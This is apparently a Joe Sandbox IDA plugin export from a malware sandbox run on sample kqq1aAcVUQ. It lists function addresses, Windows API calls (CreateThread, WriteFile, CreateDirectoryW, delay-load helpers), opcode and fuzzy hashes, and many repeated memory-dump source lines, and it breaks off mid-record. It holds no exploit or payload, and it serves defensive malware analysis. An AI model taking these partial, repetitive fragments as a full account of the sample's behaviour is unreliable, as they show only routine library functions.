Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: p%
API String ID: 2991157371-1703017251
Opcode ID: a2048c3b531da7959944c1c19330fed3bf6649194c7f467e4531589799f114bd
Instruction ID: f8896220648583f28888bc8802aae62e23cdcd4ac85c079afc7b8cd9c689df23
Opcode Fuzzy Hash: a2048c3b531da7959944c1c19330fed3bf6649194c7f467e4531589799f114bd
Instruction Fuzzy Hash: B4314931924219AFDB1EDFA8D441B9DB7F5EF44320F210499E9049B2A2EB32DE60CF50

Function 0023101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00231043
SetThreadPriority.KERNEL32(?,00000000), ref: 0023108A

Part of subcall function 00226C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00226C54

Part of subcall function 00226DCB: _wcschr.LIBVCRUNTIME ref: 00226E0A
Part of subcall function 00226DCB: _wcschr.LIBVCRUNTIME ref: 00226E19

Strings

CreateThread failed, xrefs: 0023104F

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2706921342-3849766595
Opcode ID: 6cef95cb3ce2edd2b441594f25ef911688d75c2820eaca7ffefa528a0d405a11
Instruction ID: f4c36ef2701061dcccbfde17501e2b4c9b5621ec23cd0a448e2447a0746c9247
Opcode Fuzzy Hash: 6cef95cb3ce2edd2b441594f25ef911688d75c2820eaca7ffefa528a0d405a11
Instruction Fuzzy Hash: A2012BB63103097BD3346E64BC49B76B368EB50351F20042EFD8656184CAA078F44624

Function 0023E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E51F

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

2#, xrefs: 0023E532
(#, xrefs: 0023E519

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (#$2#
API String ID: 1269201914-1099203515
Opcode ID: 2bb2a5f293fc563f548ed25cea192c8a011d4f1295f92fafa7463c2cdc396eb4
Instruction ID: 6ffbba1c11a5e924e781f3b5d17f8a5457ab1c9ad6efb652ade34c9098263bb8
Opcode Fuzzy Hash: 2bb2a5f293fc563f548ed25cea192c8a011d4f1295f92fafa7463c2cdc396eb4
Instruction Fuzzy Hash: 55B012C5679100BD3904B1081C02D3B010DC0C2F15771402EF804C00C0F8800D7D0931

Function 00229F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0022D343,00000001,?,?,?,00000000,0023551D,?,?,?), ref: 00229F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0023551D,?,?,?,?,?,00234FC7,?), ref: 00229FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0022D343,00000001,?,?), ref: 0022A011

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 38f4e8edf5046b4035f4df838c7b56e842824f9cd6466b00cf356d6714fc3fa5
Instruction ID: 4cf2b3a3b330d7d86e2742d8a072136503d26aed2b4e87713a3b713dc06e18c7
Opcode Fuzzy Hash: 38f4e8edf5046b4035f4df838c7b56e842824f9cd6466b00cf356d6714fc3fa5
Instruction Fuzzy Hash: 3F31E431214326BFDB14CF60E918B6EB7A5FF84711F04091DF94197690C775AEA8CBA2

Function 0022A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0022C27E: _wcslen.LIBCMT ref: 0022C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0022A175,?,00000001,00000000,?,?), ref: 0022A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0022A175,?,00000001,00000000,?,?), ref: 0022A30C
GetLastError.KERNEL32(?,?,?,?,0022A175,?,00000001,00000000,?,?), ref: 0022A329

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: e56a6a9d0ab867987c84e112f94d675b9d40668b83e1fb7910e78e85aa4400be
Instruction ID: 94133ce17da962ab87db48d15697d9c3791dd080f66a7ef16cf54234317c5203
Opcode Fuzzy Hash: e56a6a9d0ab867987c84e112f94d675b9d40668b83e1fb7910e78e85aa4400be
Instruction Fuzzy Hash: 7E019221120371BBEF21EEF57C09BEE22489F09781F044495F901E6491D7A4DAA58AA6

Function 0024B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0024B8B8

Strings

, xrefs: 0024B8FD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: daa3cfe33d31712b7f03cb842062a712f1f0be9080bae1b8d5fc837ee644d89f
Instruction ID: b04d0a36745c9ec9d56b1de68178993122abd0fc26fa08ff6b58f5a9749f60fc
Opcode Fuzzy Hash: daa3cfe33d31712b7f03cb842062a712f1f0be9080bae1b8d5fc837ee644d89f
Instruction Fuzzy Hash: E341177051438C9EDF2A8E288C84BF6BBBDEB55304F1404ECE6DA86142D375EA55CF60

Function 0024AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0024AFDD

Strings

LCMapStringEx, xrefs: 0024AF7D, 0024AF87

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 89c73e0fbce215bc2069c2c210b4dcbd72fd2d374a31716d6485e17084a5abb7
Instruction ID: 055ab85e28215b47cfbec6ec0b50260907875b27dfce6290d667558944cd93ac
Opcode Fuzzy Hash: 89c73e0fbce215bc2069c2c210b4dcbd72fd2d374a31716d6485e17084a5abb7
Instruction Fuzzy Hash: 39012272694209BBCF06AF90EC06DEE7F66FF09751F024155FE1866160CA328A31AF95

Function 0024AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0024A56F), ref: 0024AF55

Strings

InitializeCriticalSectionEx, xrefs: 0024AF1B, 0024AF25

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 845f91507a84edd53a3f2e0ee9b08549cd9c880778fa939b6f4cacc4d6ee2542
Instruction ID: 3e322d921d3877622632ef58933f879cb9dfad873d18ae51e26edd9de3ec4390
Opcode Fuzzy Hash: 845f91507a84edd53a3f2e0ee9b08549cd9c880778fa939b6f4cacc4d6ee2542
Instruction Fuzzy Hash: 47F0E971695208BFCF169F50EC06D9DBF61EF09752F014055FC0896260DA725E34DB99

Function 0024ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0024ADEE

Strings

FlsAlloc, xrefs: 0024ADC0, 0024ADCA

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 17004f15d863a1067bad2da99c25cec3c10f73d6f0496797c5a88c45d88b47b9
Instruction ID: 166b31d2998dd6ebb71c7921c20a0f21d1bf7b080236b0f095f43ff5fae2716a
Opcode Fuzzy Hash: 17004f15d863a1067bad2da99c25cec3c10f73d6f0496797c5a88c45d88b47b9
Instruction Fuzzy Hash: A4E0E571AE5318BBC605AB65FC0696EBB55EB09722B0101A9FC0597240CD705E608AEE

Function 0023E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 5b2d3aa04f49cf3db2613e08dfd0bbdfdd37a5394b9dba64884da7adec7b07e3
Instruction ID: 665d887d46277e116d0aa75c9fcdf73650a9aabdef9b348a0fe8b9ceda8b8812
Opcode Fuzzy Hash: 5b2d3aa04f49cf3db2613e08dfd0bbdfdd37a5394b9dba64884da7adec7b07e3
Instruction Fuzzy Hash: 60B012D927D200EC3504A1891C46C3B010DC0C1F11731403FFC0DC00C1F8906C3C0A31

Function 0023E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: f6ac4a65f7e0529cda3a1eeda98667ab6ece8dbfd74e2dc4c2e1da05b85fec44
Instruction ID: 6f63fb5ed2b3f374aaa86f425d6758526fb4edfa6c511382786cb5a2017d2d16
Opcode Fuzzy Hash: f6ac4a65f7e0529cda3a1eeda98667ab6ece8dbfd74e2dc4c2e1da05b85fec44
Instruction Fuzzy Hash: 44B012D6279100EC3504A2451C06C3B010DC0C2F11731C03FFC0DC01C0F890AC3C0931

Function 0023E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 043730c7309203b9a0e24925b3083c723df4b67e2f1b8f6de5b028c74c414b9f
Instruction ID: 62b66b4ed3d5561408af8cba5b4f56e61db66b8a91008a017a8030f6c45578f2
Opcode Fuzzy Hash: 043730c7309203b9a0e24925b3083c723df4b67e2f1b8f6de5b028c74c414b9f
Instruction Fuzzy Hash: 77B012D9279200FC350461851C46C3B010DC0C2F11731843FFC09D04C1F890AC3C0831

Function 0023E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 374bed42fdb4c311c673fa34919bbb14ef3475940335e34b667bc499d4b2b6d5
Instruction ID: 6ae2de00d9e176f2e29cff94088b62769b529acbad1c1806fb1a2ac4b3615f14
Opcode Fuzzy Hash: 374bed42fdb4c311c673fa34919bbb14ef3475940335e34b667bc499d4b2b6d5
Instruction Fuzzy Hash: 2CB012E5279200FC3544A1455C06D3B010EC0C1F21B31813FFC0DC00C0F8906D7C0A31

Function 0023E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 676c4b2aa09ebad044fea6e669662139d38abb1db48bb8c6c7aefa8a2eaa99b4
Instruction ID: 5b8d621abd9d80c934062e0a627caa783efdaa01e6eebb9349afd35d2e2e38e7
Opcode Fuzzy Hash: 676c4b2aa09ebad044fea6e669662139d38abb1db48bb8c6c7aefa8a2eaa99b4
Instruction Fuzzy Hash: 8BB012E5279100EC3504A1451D46D3B010EC0C1F21731803FFC0DC00C0FC906E3D0931

Function 0023E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: e0c713b1adbb35748090e9826002c3404ead9c1d87fd2bac70a45b4cde2d9737
Instruction ID: 9ffb2988c01e49f6f8f758128d6bc7a2e37b401761d8007be4597fc62c3d0a1d
Opcode Fuzzy Hash: e0c713b1adbb35748090e9826002c3404ead9c1d87fd2bac70a45b4cde2d9737
Instruction Fuzzy Hash: 27B012E5279100EC3504A1461C06D3B010EC0C1F21731803FFC0DC00C0F8906D3C0931

Function 0023E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 403a133583f35990851dd618ccc1d851071e5d317cef5fffa0a2a2d1ef2c3c62
Instruction ID: bb0fe902e5de5ac762e530f8fb5feb0ecc186ecd8b9167f6b5132fd4e9d09b5e
Opcode Fuzzy Hash: 403a133583f35990851dd618ccc1d851071e5d317cef5fffa0a2a2d1ef2c3c62
Instruction Fuzzy Hash: 17B092D6279240AC2544A2455806C3B010DC081F11731812AB819C01C0A8906C6C0A31

Function 0023E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD, 0023E20A

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 2d56fe8f1aebf27c523dcf1c7579f82ddd929ad2973f3e2d5c03fa2fcd5f8d9a
Instruction ID: 28e5e634f40d5a8dda11e25bf999110a4729378f48eaacac7c9169ce9e918f2b
